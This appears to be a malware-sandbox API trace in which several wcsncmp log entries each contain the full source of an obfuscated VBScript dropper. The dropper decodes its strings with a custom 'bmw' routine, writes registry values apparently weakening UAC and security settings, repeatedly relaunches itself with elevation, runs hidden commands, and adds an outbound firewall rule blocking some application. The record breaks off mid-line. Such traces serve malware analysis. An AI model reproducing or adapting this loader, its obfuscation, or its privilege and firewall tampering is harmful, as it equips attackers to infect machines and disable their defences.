bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.923] wcsncmp (_String1="index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.923] wcsncmp (_String1="ndex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.923] wcsncmp (_String1="dex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.924] wcsncmp (_String1="ex\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 